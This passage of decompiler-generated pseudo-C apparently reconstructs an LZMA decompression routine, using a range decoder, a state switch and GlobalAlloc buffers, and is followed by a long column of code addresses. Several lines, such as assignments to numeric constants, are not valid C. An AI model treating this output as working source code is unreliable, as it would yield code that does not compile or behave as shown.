							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                          0x00000000
                          0x0040604c
                          0x0040604c
                          0x00406051
                          0x004060c8
                          0x004060cf
                          0x004060d9
                          0x004066b8
                          0x004066b8
                          0x004066bb
                          0x004066bb
                          0x004066c1
                          0x004066c7
                          0x004066cd
                          0x004066e7
                          0x004066ea
                          0x004066f0
                          0x004066fb
                          0x004066fd
                          0x004066cf
                          0x004066cf
                          0x004066de
                          0x004066e2
                          0x004066e2
                          0x00406707
                          0x0040672e
                          0x0040672e
                          0x00406734
                          0x00406734
                          0x00000000
                          0x00406709
                          0x00406709
                          0x0040670d
                          0x004068bc
                          0x00000000
                          0x004068bc
                          0x00406719
                          0x00406720
                          0x00406728
                          0x0040672b
                          0x00000000
                          0x0040672b
                          0x00406053
                          0x00406053
                          0x00406057
                          0x0040605f
                          0x00406062
                          0x00406064
                          0x00406067
                          0x00406069
                          0x0040606e
                          0x00406071
                          0x00406078
                          0x0040607f
                          0x00406082
                          0x0040608d
                          0x00406095
                          0x00406095
                          0x0040608f
                          0x0040608f
                          0x0040608f
                          0x00406084
                          0x00406084
                          0x00406084
                          0x0040609c
                          0x004060ba
                          0x004060bc
                          0x0040628f
                          0x0040628f
                          0x00406292
                          0x00406295
                          0x00406298
                          0x0040629b
                          0x0040629e
                          0x004062a1
                          0x004062a4
                          0x004062a7
                          0x004062ad
                          0x004062c5
                          0x004062c8
                          0x004062cb
                          0x004062ce
                          0x004062ce
                          0x004062d1
                          0x004062d7
                          0x004062af
                          0x004062af
                          0x004062b7
                          0x004062bc
                          0x004062be
                          0x004062c0
                          0x004062c0
                          0x004062e1
                          0x004062e4
                          0x00406287
                          0x0040628d
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004062e6
                          0x00406262
                          0x00406266
                          0x0040686e
                          0x00000000
                          0x0040686e
                          0x0040626c
                          0x0040626f
                          0x00406272
                          0x00406276
                          0x00406279
                          0x0040627f
                          0x00406281
                          0x00406281
                          0x00406284
                          0x00000000
                          0x00406284
                          0x0040609e
                          0x0040609e
                          0x004060a1
                          0x004060a7
                          0x004060a9
                          0x004060a9
                          0x004060ac
                          0x004060af
                          0x004060b1
                          0x004060b2
                          0x004060b5
                          0x00406122
                          0x00406122
                          0x00406126
                          0x00406129
                          0x0040612c
                          0x0040612f
                          0x00406132
                          0x00406133
                          0x00406136
                          0x00406138
                          0x0040613e
                          0x00406141
                          0x00406144
                          0x00406147
                          0x0040614a
                          0x00406150
                          0x0040616c
                          0x0040616f
                          0x00406172
                          0x00406175
                          0x0040617c
                          0x00406182
                          0x00406186
                          0x00406152
                          0x00406152
                          0x00406156
                          0x0040615e
                          0x00406163
                          0x00406165
                          0x00406167
                          0x00406167
                          0x00406190
                          0x00406193
                          0x0040610a
                          0x0040610a
                          0x00406110
                          0x004061c3
                          0x004061c9
                          0x00000000
                          0x00000000
                          0x004061cb
                          0x004061ce
                          0x004061d1
                          0x004061d4
                          0x004061d7
                          0x004061da
                          0x004061dd
                          0x004061e0
                          0x004061e3
                          0x004061e9
                          0x00406201
                          0x00406204
                          0x00406207
                          0x0040620a
                          0x0040620a
                          0x0040620d
